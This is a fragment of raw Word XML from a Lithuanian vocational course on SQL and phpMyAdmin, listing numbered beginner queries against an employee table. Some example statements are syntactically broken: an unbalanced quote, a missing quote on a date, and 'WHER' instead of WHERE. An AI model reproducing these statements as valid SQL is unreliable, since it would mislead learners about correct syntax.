      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. PAKARTOKITE TUOS PAČIUS VEIKSMUS NAUDODAMI PHPMYADMIN</w:t>
      </w:r>
      <w:r w:rsidR="00007311">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Naudodami phpMyAdmin atitinkamus meniu, prisijunkite ir atsijunkite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00007311" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="949" w:name="_Toc10444023"/>
      <w:bookmarkStart w:id="950" w:name="_Toc13095570"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.2.</w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="951" w:name="_Toc13833464"/>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Naudoti SQL kalbą duomenų bazės užpildy</w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>mui ir informacijos išrinkimui</w:t>
      </w:r>
      <w:bookmarkEnd w:id="949"/>
      <w:bookmarkEnd w:id="950"/>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="951"/>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PANAUDOKITE TINKAMAS PAGRINDINES SQL KOMANDAS</w:t>
      </w:r>
      <w:r w:rsidR="00635BFD">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SQL komandos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00102D24" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00EF220B">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT * FROM DARBUOTOJAI;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00EF220B" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT ASMENSKODAS FROM DARBUOTOJAI;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D070EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005F3257">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS, PAVARDE, PAREIGOS FROM DARBUOTOJAI;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005F3257" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT DISTINCT SKYRIAUSPAVADINIMAS FROM DARBUOTOJAI;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F95B54" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT * FROM DARBUOTOJAI WHERE SKYRIAUSPAVADINIMAS = ‘Daug_dirbantys’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F95B54" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00C01F4F">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT PAREIGOS FROM DARBUOTOJAI WHERE VARDAS = ‘Toma’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C01F4F" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="00525972">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT * FROM DARBUOTOJAI WHERE GIMIMOMETAI = ‘1960-05-04’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00525972" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8.</w:t>
      </w:r>
      <w:r w:rsidR="00B720CA">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS FROM DARBUOTOJAI WHERE PAVARDE = ‘Morkinis’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B720CA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="003C55C2">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS, PAVARDE FROM DARBUOTOJAI WHERE SKYRIAUSPAVADINIMAS =’Daug_dirbantys’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003C55C2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10.</w:t>
      </w:r>
      <w:r w:rsidR="00684C2C">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INSERT INTO DARBUOTOJAI VALUES(38807291235, ‘Regimantas’, ‘Sabonis’, ‘2013-01-21’,’1988-07-29’,’Testuotojas’,’Testavimo’,3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00684C2C" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>11.</w:t>
      </w:r>
      <w:r w:rsidR="00B5323A">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INSERT INTO DARBUOTOJAI (ASMENSKODAS,VARDAS, PAVARDE, DIRBANUO, GIMIMOMETAI) VALUES (38101122335,’Petras’,’Petraitis’, ‘2009-10-30’,’1981-01-11’);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B5323A" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>12.</w:t>
      </w:r>
      <w:r w:rsidR="00131E3C">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UPDATE DARBUOTOJAI SET PAREIGOS=’Programuotojas’, SKYRIAUSPAVADINIMAS=’Daug dirbantys’, PROJEKTONUMERIS=2 WHERE ASMENSKODAS=38101122335;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004621FE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>13.</w:t>
      </w:r>
      <w:r w:rsidR="00872A0B">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DELETE FROM DARBUOTOJAI WHERE ASMENSKODAS=38101122335;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C87778" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>14.</w:t>
      </w:r>
      <w:r w:rsidR="00D77E8A">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INSERT INTO DARBUOTOJAI (PAVARDE, PAREIGOS) VALUES (‘Antanaitis’,’Programuotojas’),(‘Antanaitis’,’Programuotojas’);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D77E8A" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>15.</w:t>
      </w:r>
      <w:r w:rsidR="00157AF1">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UPDATE DARBUOTOJAI SET PAREIGOS= ‘Testuotojas’ WHERE PAVARDE= ‘Antanaitis’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00157AF1" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="714" w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>16.</w:t>
      </w:r>
      <w:r w:rsidR="00E31BE8">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT PAREIGOS FROM DARBUOTOJAI WHERE PAREIGOS = ‘Testuotojas; SELECT PAREIGOS FROM DARBUOTOJAI WHERE PAREIGOS = ‘Testuotoja’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E31BE8" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="952" w:name="_Toc10444024"/>
      <w:bookmarkStart w:id="953" w:name="_Toc13095571"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.3.</w:t>
      </w:r>
      <w:r w:rsidR="00451659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="954" w:name="_Toc13833465"/>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kurti duomenis duomenų baz</w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ėje valdančią programinę įrangą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="952"/>
      <w:bookmarkEnd w:id="953"/>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="954"/>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PANAUDOKITE TINKAMAS SĄLYGŲ IR GRUPAVIMO SQL KOMANDAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>SQL komandos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00451659" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00B76A6F">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT ASMENSKODAS, VARDAS, PAVARDE FROM DARBUOTOJAI WHERE GIMIMOMETAI=’1988-06-15’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B76A6F" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT * FROM DARBUOTOJAI  WHERE GIMIMOMETAI &lt; '1988-07-29';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A33922" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00835395">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT DIRBANUO ,GIMIMOMETAI FROM DARBUOTOJAI WHERE DIRBANUO BETWEEN '2000-10-30' AND 2012-11-11';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008A2C62" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00BE641E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS ,SKYRIAUSPAVADINIMAS ,PROJEKTONUMERIS  FROM DARBUOTOJAI  WHER PROJEKTONUMERIS IN (2,3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BE641E" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS ,PAVARDE ,ASMENSKODAS  FROM DARBUOTOJAI  WHERE ASMENSKODAS LIKE '4%';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BE641E" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00055CF5">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT * FROM DARBUOTOJAI  WHERE GIMIMOMETAI LIKE '%-12';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00055CF5" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="00033121">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT * FROM DARBUOTOJAI WHERE SKYRIAUSPAVADINIMAS LIKE '__u%';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00033121" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8.</w:t>
      </w:r>
      <w:r w:rsidR="000944B7">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT * FROM DARBUOTOJAI WHERE PAREIGOS IS NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00890158" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
